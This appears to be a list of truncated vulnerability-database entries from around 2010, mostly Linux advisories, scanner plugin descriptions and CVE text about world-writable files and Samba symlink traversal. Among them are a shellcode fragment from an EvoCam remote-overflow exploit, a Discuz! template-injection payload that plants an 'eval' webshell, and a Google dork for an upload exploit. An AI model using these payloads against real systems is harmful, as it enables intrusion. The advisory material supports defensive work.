Ubuntu 10.04 LTS : mountall vulnerability (USN-985-1)

Alasdair MacGregor discovered that mountall created a udev rule file with world-writable permissions. A local attacker could exploit this under certain conditions to cause udev to execute arbitrary commands as the root user. Note that Tenable Network Security has extracted the preceding descripti...

MDVA-2010:005 : msec

This update fixes two issues with msec: - some error messages could result in msec trowing an exception instead of logging the corresponding text bug 56180 - security report about group-writable files belonging to gdm user was silenced by default bug 56064 %NASLMINLEVEL 70300 @DEPRECATED@ This...

Hua-speed online trading platform oday-vulnerability warning-the black bar safety net

Hua-speed online trading platform oday program: China speed online trading platform Vulnerability description:upload, storm library google keywords: inurl:listbuy. asp? class1 EXP test: Copy the code save it as html file html head meta http-equiv="Content-Type" content="text/html; charset=gb2312"...

Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow

Apple Mac OSX EvoCam Web Server Snow Leopard - ROP Remote Overflow !/usr/bin/python EvoCam Web Server OSX 3.6.6 and 3.6.7 import socket import struct SHELL = "\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24" "\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2"...

DEBIAN-CVE-2010-2023

transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the stnlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file...

CVE-2010-2023

transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the stnlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file...

CVE-2010-2023

transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the stnlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file...

List executable and writable-executable Files, list path variable

List executable and writable-executable files, list path variable over an SSH Connection. Check for executable Files outside /usr/local/bin:/usr/bin:/bin:/usr/bin/X11: /usr/games:/sbin:/usr/sbin:/usr/local/sbin:, check for user write permission on valid executables. SPDX-FileCopyrightText: 2010...

List executable and writable-executable Files, list path variable

List executable and writable-executable Files, list path variable over an SSH Connection. Check for executable Files outside /usr/local/bin:/usr/bin:/bin:/usr/bin/X11: /usr/games:/sbin:/usr/sbin:/usr/local/sbin:, check for user write permission on valid executables. OpenVAS Vulnerability Test $Id...

Mathematica Arbitrary File Overwriting Vulnerability (Linux)

The host is running Mathematica and is prone to arbitrary file overwriting vulnerability. OpenVAS Vulnerability Test $Id: secpodmathematicasymlinkvulnlin.nasl 5394 2017-02-22 09:22:42Z teissa $ Mathematica Arbitrary File Overwriting Vulnerability Linux Authors: Sooraj KS Copyright: Copyright c 20...

multipath-tools: World-writeable socket

Background multipath-tools are used to drive the Device Mapper multipathing driver. Description multipath-tools uses world-writable permissions for the socket file /var/run/multipathd.sock. Impact Local users could send arbitrary commands to the multipath daemon, causing cluster failures and data...

CentOS Update for kdebase CESA-2010:0348 centos4 i386

Check for the Version of kdebase OpenVAS Vulnerability Test CentOS Update for kdebase CESA-2010:0348 centos4 i386 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...

openSUSE Security Update : kde4-kdm (kde4-kdm-2134)

The KDE KDM contains a local race condition which allows to make arbitrary files world-writable. CVE-2010-0436 has been assigned to this issue. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update...

openSUSE Security Update : kde4-kdm (openSUSE-SU-2010:0112-1)

The KDE KDM contains a local race condition which allows to make arbitrary files world-writable. CVE-2010-0436 has been assigned to this issue. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update...

discuz! 7.0 and below the version background get webshell-vulnerability warning-the black bar safety net

Don't need the founder, you'll need administrator. http://www.fuck.com/admincp.php?action=styles&operation=edit&id=1&adv=1 In the following there is a“custom template variables”, the variable in the fill: PHP code 1. OLDJUN', '9 9 9';eval$POSTcmd;// Replace the contents of whatever the input: 1 1...

RedHat Update for automake RHSA-2010:0321-04

Check for the Version of automake OpenVAS Vulnerability Test RedHat Update for automake RHSA-2010:0321-04 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Ubuntu Update for emacs22, emacs23 vulnerability USN-919-1

Ubuntu Update for Linux kernel vulnerabilities USN-919-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN9191.nasl 7965 2017-12-01 07:38:25Z santu $ Ubuntu Update for emacs22, emacs23 vulnerability USN-919-1 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH,...

DEBIAN-CVE-2010-0926

The default configuration of smbd in Samba before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3, when a writable share exists, allows remote authenticated users to leverage a directory traversal vulnerability, and access arbitrary files, by using the symlink command in smbclient to create...

Directory traversal

The default configuration of smbd in Samba before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3, when a writable share exists, allows remote authenticated users to leverage a directory traversal vulnerability, and access arbitrary files, by using the symlink command in smbclient to create...

CVE-2010-0926

The default configuration of smbd in Samba before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3, when a writable share exists, allows remote authenticated users to leverage a directory traversal vulnerability, and access arbitrary files, by using the symlink command in smbclient to create...